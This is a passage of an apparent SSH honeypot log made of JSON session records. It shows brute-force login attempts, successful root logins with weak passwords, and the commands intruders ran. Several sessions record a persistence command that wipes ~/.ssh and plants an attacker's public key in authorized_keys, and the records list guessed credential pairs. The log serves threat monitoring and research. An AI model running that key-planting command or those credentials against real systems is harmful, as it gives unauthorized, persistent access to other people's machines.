"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 201314
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "906bea6885d0",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:08:10.358912Z",
"end_time": "2026-05-15T12:08:16.176300Z",
"duration": "5.8",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "201314"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "7962d0bac7ab",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:08:01.728324Z",
"end_time": "2026-05-15T12:08:02.042333Z",
"duration": "0.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "e0dc7c520251",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:08:00.378922Z",
"end_time": "2026-05-15T12:08:01.686287Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / linux123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "bf018222d501",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:07:59.666337Z",
"end_time": "2026-05-15T12:08:02.038690Z",
"duration": "2.4",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "linux123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: xhl2g06n
{
"id": "e93d48551f72",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:07:21.355312Z",
"end_time": "2026-05-15T12:07:22.664775Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "xhl2g06n",
"pass": "rDsmrHIgoab9w+EfuqeP"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: user1
{
"id": "b4352a97156c",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:06:45.521797Z",
"end_time": "2026-05-15T12:06:47.592064Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "user1",
"pass": "1234"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: pakchoi
{
"id": "74374dab07b1",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:06:42.875200Z",
"end_time": "2026-05-15T12:06:44.185479Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "pakchoi",
"pass": "Kermit123@"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: user
{
"id": "b4cf2b0d1a02",
"src_ip": "2.57.121.25",
"start_time": "2026-05-15T12:06:27.140846Z",
"end_time": "2026-05-15T12:06:33.898566Z",
"duration": "6.8",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "user",
"pass": "fathead"
},
{
"user": "user",
"pass": "fabienne"
},
{
"user": "user",
"pass": "erwin"
},
{
"user": "user",
"pass": "erica1"
},
{
"user": "user",
"pass": "eragon"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: misp
{
"id": "895fad529c20",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:06:06.367260Z",
"end_time": "2026-05-15T12:06:07.678245Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "misp",
"pass": "Password1234"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: linux
{
"id": "0c387160beca",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:05:27.433358Z",
"end_time": "2026-05-15T12:05:28.743444Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "linux",
"pass": "linux123"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "863b99299662",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:05:26.765082Z",
"end_time": "2026-05-15T12:05:27.836909Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "dbe5b492c9e2",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:05:24.528774Z",
"end_time": "2026-05-15T12:05:26.597268Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Asdqwe123
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "3d456221d61d",
"src_ip": "5.95.121.178",
"start_time": "2026-05-15T12:05:22.299250Z",
"end_time": "2026-05-15T12:05:27.834037Z",
"duration": "5.5",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Asdqwe123"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"SUCCESSFUL LOGIN",
"COMMANDS RUN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "d514703e6e4d",
"src_ip": "14.103.109.71",
"start_time": "2026-05-15T12:05:12.954486Z",
"end_time": "2026-05-15T12:07:12.962445Z",
"duration": "120.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (5 distinct queries). Vector identities: admin
{
"id": "b1d527546914",
"src_ip": "2.57.121.112",
"start_time": "2026-05-15T12:05:09.685472Z",
"end_time": "2026-05-15T12:05:16.512750Z",
"duration": "6.8",
"version": "SSH-2.0-PuTTY_Release_0.83",
"hassh": "57446c12547a668110aa237e5965e374",
"attempts": [
{
"user": "admin",
"pass": "dinkle"
},
{
"user": "admin",
"pass": "dima2000"
},
{
"user": "admin",
"pass": "dima12345"
},
{
"user": "admin",
"pass": "diggers"
},
{
"user": "admin",
"pass": "dfkmrbhbz"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "3717713ef223",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:04:47.911556Z",
"end_time": "2026-05-15T12:04:48.225938Z",
"duration": "0.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "f50579694b54",
"src_ip": "201.149.53.243",
"start_time": "2026-05-15T12:04:46.561279Z",
"end_time": "2026-05-15T12:04:47.869351Z",
"duration": "1.3",
"version": "SSH-2.0-libssh_0.12.0",
"hassh": "af8223ac9914f509afdadfaf5f7ee94e",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}